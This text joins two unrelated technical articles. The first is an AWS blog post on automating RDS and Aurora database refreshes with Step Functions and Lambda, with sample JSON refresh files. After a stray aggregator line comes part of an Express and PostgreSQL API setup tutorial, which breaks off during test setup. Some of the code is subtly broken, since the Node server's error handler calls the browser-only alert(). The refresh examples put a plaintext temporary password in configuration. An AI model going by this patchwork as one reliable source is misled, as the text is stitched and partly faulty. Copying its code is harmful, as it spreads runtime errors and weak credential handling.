Keep the history of all the database refresh operations of your applications, in order to answer questions such as: When has my database last been refreshed? Does my application have all its non-production databases refreshed? Is the refresh that I launched yesterday complete?
Prerequisites
The solution implemented focuses on a time-consuming administrative task that DBAs have to deal with: the database refresh. The process consists of recreating an existing database. Typically, this is a copy used for test and development purposes whose data has to be "refreshed". You can use a backup or the last available image of the related production environment to refresh a database. The solution can also be applied to scenarios where you create a new environment from scratch. The process can involve additional steps to apply different settings or configurations to the new refreshed database.
The following diagram illustrates the process. The backup can be either logical (a partial or full export of the source dataset) or physical (a binary copy of the database, which can be full, incremental, whole, or partial). The solution described in this post allows you to use physical backups (Amazon RDS or Aurora snapshots) during the restore process, or the Aurora cloning feature, in order to copy your databases.
Solution overview
The solution uses several AWS services to orchestrate the refresh process:
Amazon Aurora – A MySQL- and PostgreSQL-compatible relational database built for the cloud. The solution uses Aurora snapshots or the fast cloning feature to restore Aurora database instances. Restores are performed using APIs provided by RDS and Aurora.
Amazon DynamoDB – A fully managed key-value and document database that delivers single-digit millisecond performance at any scale. We use it to keep track of all the refresh operations run by this solution.
Amazon Elastic Compute Cloud – Amazon EC2 provides secure, resizable compute capacity in the cloud. The solution uses it in conjunction with AWS Systems Manager to run SQL scripts against your restored databases.
AWS Lambda – Lambda lets you run code without provisioning or managing servers. You pay only for the compute time you consume. Lambda functions are used to implement all the steps of a database refresh.
AWS Step Functions – A serverless function orchestrator that makes it easy to sequence AWS Lambda functions and multiple AWS services into business-critical applications. This is the core service of the solution, used to orchestrate database refreshes.
Amazon RDS – A fully managed relational database solution that provides you with six familiar databases. The solution uses Amazon RDS snapshots to restore RDS database instances. Restores are performed using APIs provided by RDS and Aurora.
Amazon Simple Notification Service – Amazon SNS is a fully managed messaging service for both system-to-system and app-to-person communication. We use it to notify users about the completion of refresh operations.
Amazon Simple Storage Service – Amazon S3 is an object storage service that offers industry-leading scalability, data availability, security and performance. We use it to store the SQL scripts that the solution allows you to run against new restored databases.
AWS Secrets Manager – Secrets Manager helps you to securely encrypt, store, and retrieve credentials for your database and other services. We use it to manage the access credentials of the databases involved in your refreshes.
AWS Systems Manager – Systems Manager organizes, monitors and automates management tasks on your AWS resources. With Systems Manager Run Command, you can optionally run SQL scripts stored on Amazon S3 against your restored databases.
This solution may incur costs; check the pricing pages related to the services you're using.
Architecture
The architecture of the proposed solution is shown in the following diagram.
The pre-restore workflow has the following steps:
1. The end user prepares the refresh file (described later in this post) by configuring which steps have to be performed (including the optional creation of a Secrets Manager secret).
2. If necessary, the end user can also prepare SQL scripts, stored on Amazon S3, to run as post-refresh scripts.
The restore workflow has the following steps:
1. The end user initiates the refresh process by starting the Step Functions state machine (the refresh process could be initiated automatically, if needed).
2. The state machine manages each step of the database restore by invoking Lambda functions that are part of this solution.
The post-restore workflow includes the following steps:
1. When the restore is complete, the state machine runs the post-restore SQL scripts. It provides two options:
- The state machine can run the scripts, stored on Amazon S3, through a Lambda function. If configured, you can use Secrets Manager to store and manage the database credentials.
- The state machine can run the scripts, stored on Amazon S3, using an EC2 instance, through Systems Manager Run Command.
2. The state machine uses a DynamoDB table to store information about the process and its status.
3. The state machine notifies the end user about the process's final status using Amazon SNS.
Steps of a database refresh
Before describing in more detail what the solution looks like and how it works, it's important to understand at a high level the main steps that are part of a database refresh:
1. A backup of the source database is created.
2. If the target database already exists, it's stopped or, in most cases, deleted.
3. The target database is re-created through a database restore operation, using the backup from Step 1.
4. Post-restore scripts are run against the new restored target database.
The Step Functions state machine implemented for this solution is composed of several states; most of them are related to specific steps of a database refresh operation. In particular, some states are required only for Amazon RDS, others only for Aurora, and others are required for both.
The following list shows the main steps related to a refresh of an RDS DB instance performed by our solution (step number, step name, and description):
1. delete-replicas – Deletes the existing read replicas of the target database
2. stop-old-database – Stops the existing target database
3. perform-restore – Performs the restore
4. delete-old-database – Deletes the old target database
5. rename-database – Renames the new target database
6. fix-tags – Updates the tags of the new target database
7. create-read-replicas – Re-creates the read replicas previously deleted
8. change-admin-pwd – Changes the admin password of the new target database
9. rotate-admin-pwd – Rotates the admin password within the secret for the new target database
10. runscripts – Runs SQL scripts against the new target database
11. update-dynamodb – Updates a DynamoDB table with some information about the refresh completed
12. send-msg – Sends an SNS notification (e-mail) about the completion of the refresh
The following list shows the main steps related to a refresh of an Aurora cluster performed by our solution (step number, step name, and description):
1. delete-replicas – Deletes the existing read replicas of the target database
2. perform-restore – Performs the restore (it only creates the cluster)
3. create-instance – Creates a new instance within the cluster restored at Step 2
4. delete-old-database – Deletes the old target DB instance
5. delete-old-cluster – Deletes the old target cluster
6. rename-cluster – Renames the new target cluster
7. rename-database – Renames the new target database
8. fix-tags – Updates the tags of the new target database
9. create-read-replicas – Re-creates the read replicas previously deleted
10. change-admin-pwd – Changes the admin password of the new target database
11. rotate-admin-pwd – Rotates the admin password within the secret for the new target database
12. runscripts – Runs SQL scripts against the new target database
13. update-dynamodb – Updates a DynamoDB table with some information about the refresh completed
14. send-msg – Sends an SNS notification (e-mail) about the completion of the refresh
The graphic representation of the Step Functions state machine that contains all the states mentioned above is available on the GitHub repo. You can use it on RDS DB instances, Aurora clusters, or both.
The job poller strategy
One of the main challenges of implementing an orchestrator with serverless services is managing their stateless nature. When a certain operation is performed by a Lambda function against a database, how can we know when the operation is complete? The job poller strategy is a good solution. The following image is an extract from the solution showing this mechanism. For most of the steps that are part of a database refresh, we implement the same strategy:
1. Step Functions invokes a Lambda function that performs a certain operation (such as restoring a database).
2. Step Functions waits a certain number of seconds (which you configure) using a "Wait" state.
3. Step Functions invokes a Lambda function that checks if the operation has completed (for example, if the database has been restored and its status is "available").
4. Step Functions verifies the result of the previous check using a "Choice" state.
5. Step Functions goes to the next state if the operation has completed; otherwise it waits again (returns to Step 2).
Configuring your database refresh
The steps of the database refresh are orchestrated by a Step Functions state machine based on an input file provided – the "refresh file". It's a JSON document containing all the input parameters for the state machine (in particular for the Lambda functions associated with the state machine states), which determines the characteristics of the refresh. A refresh file contains information about a specific refresh, so ideally, for a single production database with two different non-production environments (one for development and one for test), a DBA has to prepare two refresh files. After these files are defined, they're ready to be used and the related refresh can be scheduled or automated.
The following code is the high-level structure of a refresh file:
{
  "comment": "",
  "<state name>": {
    "<parameter>": "<value>",
    "<parameter>": "<value>",
    "<parameter>": "<value>",
    [..]
    "wait_time": <seconds>,
    "check": {
      "<parameter>": "<value>",
      "<parameter>": "<value>",
      "checktodo": "<check name>",
      "torun": "true|false"
    },
    "torun": "true|false"
  },
  "<state name>": {
    "<parameter>": "<value>",
    "<parameter>": "<value>",
    "<parameter>": "<value>",
    [..]
    "wait_time": <seconds>,
    "torun": "true|false"
  },
  [..]
}
The file contains an element for every state machine's state that needs an input. For more information about defining it, see the GitHub repo.
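Once a refresh file is defined, the refresh can be launched (or scheduled) by starting the state machine with the file as input. The following is a sketch using the AWS CLI, where the state machine ARN and the file name are placeholders; the exact input format expected by the state machine is documented in the GitHub repo:
aws stepfunctions start-execution \
  --state-machine-arn arn:aws:states:<region>:<account-id>:stateMachine:<refresh-state-machine-name> \
  --input file://refresh-file.json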
Keep in mind the following about the refresh file:

- Not all the elements are required; some of them are related to steps that you may not want to run during a database refresh.
- Some elements are related only to Amazon RDS, others only to Aurora.
- Each element has a "torun" attribute that you can set to "false" in case you want to skip the related step.
- Each element has a "wait_time" attribute that determines how long the state machine has to wait before checking whether the related operation or step is complete.
- Some elements have a "check" section that contains the input parameters for the Lambda function that verifies whether a certain step completed successfully. This section has a "torun" parameter as well.
- Within an element, some parameters are required and others are optional.
- Within an element, some parameters are related to each other; if one has a value, the other one becomes required as well.

In this post, we show you three examples of elements related to three different steps of a database refresh. The following code shows a refresh of an RDS DB instance to the latest point:

[..]
"restore": {
  "dbservice": "rds",
  "source": "mysqlinstp",
  "target": "mysqlinstd",
  "restoretype": "latestpoint",
  "application": "app1",
  "environment": "development",
  "port": 3307,
  "subgrp": "db-sub-grp-virginia",
  "iamdbauth": "False",
  "cwalogs": "audit,error,general,slowquery",
  "copytagstosnap": "True",
  "dbparamgrp": "default.mysql5.7",
  "deletionprotection": "False",
  "secgrpids": "sg-03aa3aa1590daa4d8",
  "multiaz": "False",
  "dbname": "mysqlinstd",
  "dbclass": "db.t3.micro",
  "autominor": "False",
  "storagetype": "gp2",
  "wait_time": 60,
  "check": {
    "dbservice": "rds",
    "dbinstance": "mysqlinstdtemp",
    "checktodo": "checkrestore",
    "torun": "true"
  },
  "torun": "true"
}
[..]

The preceding section of the refresh file indicates that the RDS for MySQL DB instance "mysqlinstp" must be used as the source for a restore to the latest point of the DB instance "mysqlinstd". The section includes other information about the new database to be restored, including the security group ID, the storage type, and the DB instance class. The state machine verifies every 60 seconds whether the restore operation is complete. In the "check" section, you can see that a database is always restored with a name ending with the suffix "temp". This suffix is removed later by another step.

The following code illustrates how to rename an RDS for MySQL DB instance once restored:

[..]
"rename": {
  "dbservice": "rds",
  "dbinstance": "mysqlinstdtemp",
  "wait_time": 10,
  "check": {
    "dbservice": "rds",
    "dbinstance": "mysqlinstd",
    "checktodo": "checkrename",
    "torun": "true"
  },
  "torun": "true"
}
[..]

The preceding section of the refresh file indicates that the newly restored RDS DB instance "mysqlinstdtemp" must be renamed to "mysqlinstd". The state machine verifies every 10 seconds whether the rename operation is complete.

The following code runs post-refresh SQL scripts against a newly restored RDS DB instance:

[..]
"runscripts": {
  "dbservice": "rds",
  "dbinstance": "mysqlinstd",
  "engine": "mysql",
  "access": "secret",
  "secretname": "/development/app1r/mysqlinstd",
  "method": "lambda",
  "bucketname": "awsolproj",
  "prefix": "rdsmysql/mysqlinstd",
  "keys": "00test.sql,01test.sql",
  "wait_time": 10,
  "check": {
    "dbservice": "rds",
    "bucketname": "awsolproj",
    "prefix": "rdsmysql/mysqlinstd",
    "checktodo": "runscripts",
    "torun": "true"
  },
  "torun": "true"
}
[..]
The preceding section of the refresh file indicates that the scripts "00test.sql" and "01test.sql", stored on Amazon S3 in the bucket "awsolproj", must be run through Lambda against the RDS for MySQL DB instance "mysqlinstd". Database credentials are retrieved using Secrets Manager, and the status of the operation is verified every 10 seconds.

Managing secrets

At the end of the restore, the new database has the same passwords as the source for all the users within the database, including the primary user. This situation could represent a problem from a security standpoint, and for this reason the Step Functions state machine includes the following two states: change-admin-pwd and rotate-admin-pwd.

With change-admin-pwd, the password of the primary user is automatically changed to a new one specified in the refresh file. If a Secrets Manager secret is configured for that database, the secret can be synchronized as well. See the following code:

[..]
"changeadminpwd": {
  "dbservice": "rds",
  "dbinstance": "mysqlinstd",
  "temppwd": "temppwd123",
  "secret": "true",
  "secretname": "/development/app1/mysqlinstd",
  "wait_time": 15,
  "check": {
    "dbservice": "rds",
    "dbinstance": "mysqlinstd",
    "checktodo": "checkpwd",
    "torun": "true"
  },
  "torun": "true"
}
[..]

With rotate-admin-pwd, if a Secrets Manager secret is configured and it has rotation settings enabled, the secret containing the primary user password is rotated:

"rotateadminpwd": {
  "dbservice": "rds",
  "dbinstance": "mybetainstd",
  "secretname": "/development/gamma/mybetainstd",
  "wait_time": 15,
  "check": {
    "dbservice": "rds",
    "secretname": "/development/gamma/mybetainstd",
    "temppwd": "temppwd123",
    "checktodo": "rotatepwd",
    "torun": "true"
  },
  "torun": "true"
}

The solution allows you to run post-refresh SQL scripts in two ways:

- Using Lambda
- Using Systems Manager Run Command and EC2

The first option is more suitable if you're more familiar with Lambda and want to keep the solution's infrastructure completely serverless. Otherwise, DBAs who are used to directly managing SQL scripts on a server can easily manage them through Systems Manager: scripts are downloaded from Amazon S3 to the EC2 instance that is part of the solution and run from there. In both cases, you have to store the scripts on Amazon S3.

The following code is the section of the refresh file related to the "runscripts" state (the angle-bracket placeholders stand for values you provide):

"runscripts": {
  "dbservice": "aurora|rds",
  "cluster": "<cluster_name>",
  "dbinstance": "<instance_name>",
  "engine": "aurora-mysql|mysql|mariadb|oracle|aurora-postgresql|postgresql",
  "access": "pwd|secret",
  "temppwd": "<temporary_password>",
  "secretname": "<secret_name>",
  "method": "lambda|ec2",
  "bucketname": "<bucket_name>",
  "prefix": "<prefix>/",
  "keys": "<key1>,<key2>,<key3>",
  "wait_time": <seconds>,
  "check": {
    "dbservice": "aurora|rds",
    "bucketname": "<bucket_name>",
    "prefix": "<prefix>/",
    "checktodo": "runscripts",
    "torun": "true"
  },
  "torun": "true"
}

Within a SQL script, you can run SELECT, DDL (Data Definition Language), DML (Data Manipulation Language), and DCL (Data Control Language) statements. As of this writing, this feature is available only for MySQL-related databases (Amazon RDS for MySQL, Amazon RDS for MariaDB, and Aurora MySQL).

Tracking and troubleshooting your database refresh

Keeping track of database refreshes is important, especially when you have to manage hundreds of production databases plus the related non-production ones. This solution uses an encrypted DynamoDB table to record information about database refreshes, giving you the ability to quickly answer questions like the following:

- Which date is the data of this database aligned to?
- When was the last time we refreshed this database?
- From which source was this database copied?
- Did the refresh of this database run successfully yesterday?
- Considering the production database, what's the status of the refreshes of its non-production databases?

The current structure of the DynamoDB table is the following:

- Table name – dbalignement-awssol
- Partition key – dbinstance
- Sort key – restoredate
- Additional attributes – appname, environment, recordingtime, restoretype, snapshot, source, status

As of this writing, the solution doesn't provide any local secondary index (LSI) or global secondary index (GSI) for the table, but you can easily add new GSIs to increase the number of access patterns that can be satisfied, based on your needs.

If a database refresh fails for any reason, you can use different services to understand why. You can easily monitor the runs of your state machines through the Step Functions API or through its dashboard. The graph inspector can immediately tell you at which state there was a failure or at which state the state machine got stuck. If you choose a state, you can also take a look at the related input and output.

You can also monitor the output of the Lambda functions associated with the states of the solution. Lambda logs information about its runs in Amazon CloudWatch Logs, from which you can get more details about what happened during a certain operation.

Get notified or verify the database refresh completion

The solution uses Amazon SNS to send emails about the success or failure of the database refreshes performed. In case of success, some details about the database just refreshed are included in the message sent. The following code is the section of the refresh file related to the "sendmsg" state (again with placeholders for the values you provide):

"sendmsg": {
  "dbservice": "aurora|rds",
  "application": "<application_name>",
  "environment": "<environment_name>",
  "dbinstance": "<instance_name>",
  "source": "<source_database>",
  "restoretype": "fromsnapshot|restorepoint|latestpoint|fastcloning",
  "topicarn": "<sns_topic_arn>",
  "torun": "true|false"
}

This feature is optional.

What's next

The solution could be improved in some aspects, especially in the submission of the information about the database refresh. As of this writing, the input to provide must be manually prepared, but in the future we're thinking about providing a user interface through which you can create the related JSON files and immediately perform some pre-checks that validate the information provided.

Notifications are sent to users via Amazon SNS, but another option could be to use Amazon Simple Email Service (Amazon SES) to provide more detailed information about the refreshes performed, sending formatted e-mails with additional details attached about the new database just restored.

As of this writing, the solution doesn't support Amazon RDS for SQL Server, and running post-refresh SQL scripts is available only for MySQL-related engines. We're working to include those features in the remaining engines.

Conclusion

In this post, we showed how you can automate database refresh operations using serverless technology. The solution described can help you increase the level of automation in your infrastructure; in particular, it can help reduce the time spent on an important and critical maintenance activity such as database refreshes, allowing DBAs to focus more on what matters when they manage their Amazon RDS and Aurora databases on AWS.

We'd love to hear what you think! If you have questions or suggestions, please leave a comment.
About the Authors

Paola Lorusso is a Specialist Database Solutions Architect based in Milan, Italy. She works with companies of all sizes to support their innovation initiatives in the database area. In her role she helps customers discover database services and design solutions on AWS, based on data access patterns and business requirements. She brings her technical experience close to the customer, supporting migration strategies and developing new solutions with relational and NoSQL databases.

Marco Tamassia is a technical instructor based in Milan, Italy. He delivers a wide range of technical training to AWS customers across EMEA. He also collaborates in the creation of new courses such as "Planning & Designing Databases on AWS" and "AWS Certified Database – Specialty". Marco has a deep background as a Database Administrator (DBA) for companies of all sizes (including AWS). This allows him to bring his database knowledge into the classroom, bringing real-world examples to his students.

https://aws.amazon.com/blogs/database/orchestrating-database-refreshes-for-amazon-rds-and-amazon-aurora/
agilenano · 5 years ago
Text
Agilenano - News: How To Set Up An Express API Backend Project With PostgreSQL, by Chidi Orji (published 2020-04-08T11:00:00+00:00, updated 2020-04-08T13:35:17+00:00)
We will take a Test-Driven Development (TDD) approach and set up a Continuous Integration (CI) job to automatically run our tests on Travis CI and AppVeyor, complete with code quality and coverage reporting. We will learn about controllers, models (with PostgreSQL), error handling, and asynchronous Express middleware. Finally, we'll complete the CI/CD pipeline by configuring automatic deploys on Heroku.

It sounds like a lot, but this tutorial is aimed at beginners who are ready to try their hands at a backend project with some level of complexity, and who may still be confused as to how all the pieces fit together in a real project. It is robust without being overwhelming and is broken down into sections that you can complete in a reasonable length of time.

Getting Started

The first step is to create a new directory for the project and start a new Node.js project. Node is required to continue with this tutorial. If you don't have it installed, head over to the official website, download, and install it before continuing.

I will be using yarn as my package manager for this project. There are installation instructions for your specific operating system here. Feel free to use npm if you like.

Open your terminal, create a new directory, and start a Node.js project.

# create a new directory
mkdir express-api-template

# change to the newly-created directory
cd express-api-template

# initialize a new Node.js project
npm init

Answer the questions that follow to generate a package.json file. This file holds information about your project. Examples of such information include what dependencies it uses, the command to start the project, and so on.

You may now open the project folder in your editor of choice. I use Visual Studio Code. It's a free IDE with tons of plugins to make your life easier, and it's available for all major platforms. You can download it from the official website.

Create the following files in the project folder:

README.md
.editorconfig

Here's a description of what .editorconfig does from the EditorConfig website. (You probably don't need it if you're working solo, but it does no harm, so I'll leave it here.)

"EditorConfig helps maintain consistent coding styles for multiple developers working on the same project across various editors and IDEs."

Open .editorconfig and paste the following code:

root = true
[*]
indent_style = space
indent_size = 2
charset = utf-8
trim_trailing_whitespace = false
insert_final_newline = true

The [*] means that we want to apply the rules that come under it to every file in the project. We want an indent size of two spaces and the UTF-8 character set. We also leave trailing whitespace untouched (trim_trailing_whitespace is set to false) and insert a final empty line in each file.

Open README.md and add the project name as a first-level heading.

# Express API template

Let's add version control right away.

# initialize the project folder as a git repository
git init

Create a .gitignore file and enter the following lines:

node_modules/
yarn-error.log
.env
.nyc_output
coverage
build/

These are all the files and folders we don't want to track. We don't have them in our project yet, but we'll see them as we proceed.

At this point, you should have the following folder structure.

EXPRESS-API-TEMPLATE
├── .editorconfig
├── .gitignore
├── package.json
└── README.md

I consider this to be a good point to commit my changes and push them to GitHub.

Starting A New Express Project

Express is a Node.js framework for building web applications. According to the official website, it is a "fast, unopinionated, minimalist web framework for Node.js". There are other great web application frameworks for Node.js, but Express is very popular, with over 47k GitHub stars at the time of this writing.

In this article, we will not be having a lot of discussions about all the parts that make up Express. For that discussion, I recommend you check out Jamie's series. The first part is here, and the second part is here.

Install Express and start a new Express project. It's possible to manually set up an Express server from scratch, but to make our life easier we'll use the express-generator to set up the app skeleton.

# install the express generator globally
yarn global add express-generator

# install express
yarn add express

# generate the express project in the current folder
express -f

The -f flag forces Express to create the project in the current directory.

We'll now perform some house-cleaning operations:

1. Delete the file routes/users.js.
2. Delete the folders public/ and views/.
3. Rename the file bin/www to bin/www.js.
4. Uninstall jade with the command yarn remove jade.
5. Create a new folder named src/ and move the following inside it: the app.js file, the bin/ folder, and the routes/ folder.

Open up package.json and update the start script to look like below.

"start": "node ./src/bin/www"

At this point, your project folder structure looks like below. You can see how VS Code highlights the file changes that have taken place.

EXPRESS-API-TEMPLATE
├── node_modules
├── src
|   ├── bin
│   │   ├── www.js
│   ├── routes
│   |   ├── index.js
│   └── app.js
├── .editorconfig
├── .gitignore
├── package.json
├── README.md
└── yarn.lock

Open src/app.js and replace the content with the below code.

var logger = require('morgan');
var express = require('express');
var cookieParser = require('cookie-parser');
var indexRouter = require('./routes/index');

var app = express();

app.use(logger('dev'));
app.use(express.json());
app.use(express.urlencoded({ extended: true }));
app.use(cookieParser());
app.use('/v1', indexRouter);

module.exports = app;

After requiring some libraries, we instruct Express to handle every request coming to /v1 with indexRouter.

Replace the content of routes/index.js with the below code:

var express = require('express');
var router = express.Router();

router.get('/', function(req, res, next) {
  return res.status(200).json({ message: 'Welcome to Express API template' });
});

module.exports = router;

We grab Express, create a router from it, and serve the / route, which returns a status code of 200 and a JSON message.

Start the app with the below command:

# start the app
yarn start

If you've set up everything correctly you should only see $ node ./src/bin/www in your terminal.

Visit http://localhost:3000/v1 in your browser. You should see the following message:

{
  "message": "Welcome to Express API template"
}

This is a good point to commit our changes. The corresponding branch in my repo is 01-install-express.

Converting Our Code To ES6

The code generated by express-generator is in ES5, but in this article, we will be writing all our code in ES6 syntax. So, let's convert our existing code to ES6.
Replace the content of routes/index.js with the below code: import express from 'express'; const indexRouter = express.Router(); indexRouter.get('/', (req, res) => res.status(200).json({ message: 'Welcome to Express API template' }) ); export default indexRouter; It is the same code as we saw above, but with the import statement and an arrow function in the / route handler. Replace the content of src/app.js with the below code: import logger from 'morgan'; import express from 'express'; import cookieParser from 'cookie-parser'; import indexRouter from './routes/index'; const app = express(); app.use(logger('dev')); app.use(express.json()); app.use(express.urlencoded({ extended: true })); app.use(cookieParser()); app.use('/v1', indexRouter); export default app; Let’s now take a look at the content of src/bin/www.js. We will build it incrementally. Delete the content of src/bin/www.js and paste in the below code block. #!/usr/bin/env node /** * Module dependencies. */ import debug from 'debug'; import http from 'http'; import app from '../app'; /** * Normalize a port into a number, string, or false. */ const normalizePort = val => { const port = parseInt(val, 10); if (Number.isNaN(port)) { // named pipe return val; } if (port >= 0) { // port number return port; } return false; }; /** * Get port from environment and store in Express. */ const port = normalizePort(process.env.PORT || '3000'); app.set('port', port); /** * Create HTTP server. */ const server = http.createServer(app); // next code block goes here This code checks if a custom port is specified in the environment variables. If none is set the default port value of 3000 is set on the app instance, after being normalized to either a string or a number by normalizePort. The server is then created from the http module, with app as the callback function. The #!/usr/bin/env node line is optional since we would specify node when we want to execute this file. But make sure it is on line 1 of src/bin/www.js file or remove it completely. Let’s take a look at the error handling function. Copy and paste this code block after the line where the server is created. /** * Event listener for HTTP server "error" event. */ const onError = error => { if (error.syscall !== 'listen') { throw error; } const bind = typeof port === 'string' ? `Pipe ${port}` : `Port ${port}`; // handle specific listen errors with friendly messages switch (error.code) { case 'EACCES': alert(`${bind} requires elevated privileges`); process.exit(1); break; case 'EADDRINUSE': alert(`${bind} is already in use`); process.exit(1); break; default: throw error; } }; /** * Event listener for HTTP server "listening" event. */ const onListening = () => { const addr = server.address(); const bind = typeof addr === 'string' ? `pipe ${addr}` : `port ${addr.port}`; debug(`Listening on ${bind}`); }; /** * Listen on provided port, on all network interfaces. */ server.listen(port); server.on('error', onError); server.on('listening', onListening); The onError function listens for errors in the http server and displays appropriate error messages. The onListening function simply outputs the port the server is listening on to the console. Finally, the server listens for incoming requests at the specified address and port. At this point, all our existing code is in ES6 syntax. Stop your server (use Ctrl + C) and run yarn start. You’ll get an error SyntaxError: Invalid or unexpected token. This happens because Node (at the time of writing) doesn’t support some of the syntax we’ve used in our code. 
We’ll now fix that in the following section. Configuring Development Dependencies: babel, nodemon, eslint, And prettier It’s time to set up most of the scripts we’re going to need at this phase of the project. Install the required libraries with the below commands. You can just copy everything and paste it in your terminal. The comment lines will be skipped. # install babel scripts yarn add @babel/cli @babel/core @babel/plugin-transform-runtime @babel/preset-env @babel/register @babel/runtime @babel/node --dev This installs all the listed babel scripts as development dependencies. Check your package.json file and you should see a devDependencies section. All the installed scripts will be listed there. The babel scripts we’re using are explained below: @babel/cli A required install for using babel. It allows the use of Babel from the terminal and is available as ./node_modules/.bin/babel. @babel/core Core Babel functionality. This is a required installation. @babel/node This works exactly like the Node.js CLI, with the added benefit of compiling with babel presets and plugins. This is required for use with nodemon. @babel/plugin-transform-runtime This helps to avoid duplication in the compiled output. @babel/preset-env A collection of plugins that are responsible for carrying out code transformations. @babel/register This compiles files on the fly and is specified as a requirement during tests. @babel/runtime This works in conjunction with @babel/plugin-transform-runtime. Create a file named .babelrc at the root of your project and add the following code: { "presets": ["@babel/preset-env"], "plugins": ["@babel/transform-runtime"] } Let’s install nodemon # install nodemon yarn add nodemon --dev nodemon is a library that monitors our project source code and automatically restarts our server whenever it observes any changes. Create a file named nodemon.json at the root of your project and add the code below: { "watch": [ "package.json", "nodemon.json", ".eslintrc.json", ".babelrc", ".prettierrc", "src/" ], "verbose": true, "ignore": ["*.test.js", "*.spec.js"] } The watch key tells nodemon which files and folders to watch for changes. So, whenever any of these files changes, nodemon restarts the server. The ignore key tells it the files not to watch for changes. Now update the scripts section of your package.json file to look like the following: # build the content of the src folder "prestart": "babel ./src --out-dir build" # start server from the build folder "start": "node ./build/bin/www" # start server in development mode "startdev": "nodemon --exec babel-node ./src/bin/www" prestart scripts builds the content of the src/ folder and puts it in the build/ folder. When you issue the yarn start command, this script runs first before the start script. start script now serves the content of the build/ folder instead of the src/ folder we were serving previously. This is the script you’ll use when serving the file in production. In fact, services like Heroku automatically run this script when you deploy. yarn startdev is used to start the server during development. From now on we will be using this script as we develop the app. Notice that we’re now using babel-node to run the app instead of regular node. The --exec flag forces babel-node to serve the src/ folder. For the start script, we use node since the files in the build/ folder have been compiled to ES5. Run yarn startdev and visit http://localhost:3000/v1. Your server should be up and running again. 
The final step in this section is to configure ESLint and prettier. ESLint helps with enforcing syntax rules while prettier helps for formatting our code properly for readability. Add both of them with the command below. You should run this on a separate terminal while observing the terminal where our server is running. You should see the server restarting. This is because we’re monitoring package.json file for changes. # install elsint and prettier yarn add eslint eslint-config-airbnb-base eslint-plugin-import prettier --dev Now create the .eslintrc.json file in the project root and add the below code: { "env": { "browser": true, "es6": true, "node": true, "mocha": true }, "extends": ["airbnb-base"], "globals": { "Atomics": "readonly", "SharedArrayBuffer": "readonly" }, "parserOptions": { "ecmaVersion": 2018, "sourceType": "module" }, "rules": { "indent": ["warn", 2], "linebreak-style": ["error", "unix"], "quotes": ["error", "single"], "semi": ["error", "always"], "no-console": 1, "comma-dangle": [0], "arrow-parens": [0], "object-curly-spacing": ["warn", "always"], "array-bracket-spacing": ["warn", "always"], "import/prefer-default-export": [0] } } This file mostly defines some rules against which eslint will check our code. You can see that we’re extending the style rules used by Airbnb. In the "rules" section, we define whether eslint should show a warning or an error when it encounters certain violations. For instance, it shows a warning message on our terminal for any indentation that does not use 2 spaces. A value of [0] turns off a rule, which means that we won’t get a warning or an error if we violate that rule. Create a file named .prettierrc and add the code below: { "trailingComma": "es5", "tabWidth": 2, "semi": true, "singleQuote": true } We’re setting a tab width of 2 and enforcing the use of single quotes throughout our application. Do check the prettier guide for more styling options. Now add the following scripts to your package.json: # add these one after the other "lint": "./node_modules/.bin/eslint ./src" "pretty": "prettier --write '**/*.{js,json}' '!node_modules/**'" "postpretty": "yarn lint --fix" Run yarn lint. You should see a number of errors and warnings in the console. The pretty command prettifies our code. The postpretty command is run immediately after. It runs the lint command with the --fix flag appended. This flag tells ESLint to automatically fix common linting issues. In this way, I mostly run the yarn pretty command without bothering about the lint command. Run yarn pretty. You should see that we have only two warnings about the presence of alert in the bin/www.js file. Here’s what our project structure looks like at this point. EXPRESS-API-TEMPLATE ├── build ├── node_modules ├── src | ├── bin │ │ ├── www.js │ ├── routes │ | ├── index.js │ └── app.js ├── .babelrc ├── .editorconfig ├── .eslintrc.json ├── .gitignore ├── .prettierrc ├── nodemon.json ├── package.json ├── README.md └── yarn.lock You may find that you have an additional file, yarn-error.log in your project root. Add it to .gitignore file. Commit your changes. The corresponding branch at this point in my repo is 02-dev-dependencies. Settings And Environment Variables In Our .env File In nearly every project, you’ll need somewhere to store settings that will be used throughout your app e.g. an AWS secret key. We store such settings as environment variables. This keeps them away from prying eyes, and we can use them within our application as needed. 
I like having a settings.js file with which I read all my environment variables. Then, I can refer to the settings file from anywhere within my app. You’re at liberty to name this file whatever you want, but there’s some kind of consensus about naming such files settings.js or config.js. For our environment variables, we’ll keep them in a .env file and read them into our settings file from there. Create the .env file at the root of your project and enter the below line: TEST_ENV_VARIABLE="Environment variable is coming across" To be able to read environment variables into our project, there’s a nice library, dotenv that reads our .env file and gives us access to the environment variables defined inside. Let’s install it. # install dotenv yarn add dotenv Add the .env file to the list of files being watched by nodemon. Now, create the settings.js file inside the src/ folder and add the below code: import dotenv from 'dotenv'; dotenv.config(); export const testEnvironmentVariable = process.env.TEST_ENV_VARIABLE; We import the dotenv package and call its config method. We then export the testEnvironmentVariable which we set in our .env file. Open src/routes/index.js and replace the code with the one below. import express from 'express'; import { testEnvironmentVariable } from '../settings'; const indexRouter = express.Router(); indexRouter.get('/', (req, res) => res.status(200).json({ message: testEnvironmentVariable })); export default indexRouter; The only change we’ve made here is that we import testEnvironmentVariable from our settings file and use is as the return message for a request from the / route. Visit http://localhost:3000/v1 and you should see the message, as shown below. { "message": "Environment variable is coming across." } And that’s it. From now on we can add as many environment variables as we want and we can export them from our settings.js file. This is a good point to commit your code. Remember to prettify and lint your code. The corresponding branch on my repo is 03-env-variables. Writing Our First Test It’s time to incorporate testing into our app. One of the things that give the developer confidence in their code is tests. I’m sure you’ve seen countless articles on the web preaching Test-Driven Development (TDD). It cannot be emphasized enough that your code needs some measure of testing. TDD is very easy to follow when you’re working with Express.js. In our tests, we will make calls to our API endpoints and check to see if what is returned is what we expect. Install the required dependencies: # install dependencies yarn add mocha chai nyc sinon-chai supertest coveralls --dev Each of these libraries has its own role to play in our tests. mocha test runner chai used to make assertions nyc collect test coverage report sinon-chai extends chai’s assertions supertest used to make HTTP calls to our API endpoints coveralls for uploading test coverage to coveralls.io Create a new test/ folder at the root of your project. Create two files inside this folder: test/setup.js test/index.test.js Mocha will find the test/ folder automatically. Open up test/setup.js and paste the below code. This is just a helper file that helps us organize all the imports we need in our test files. import supertest from 'supertest'; import chai from 'chai'; import sinonChai from 'sinon-chai'; import app from '../src/app'; chai.use(sinonChai); export const { expect } = chai; export const server = supertest.agent(app); export const BASE_URL = '/v1'; This is like a settings file, but for our tests. 
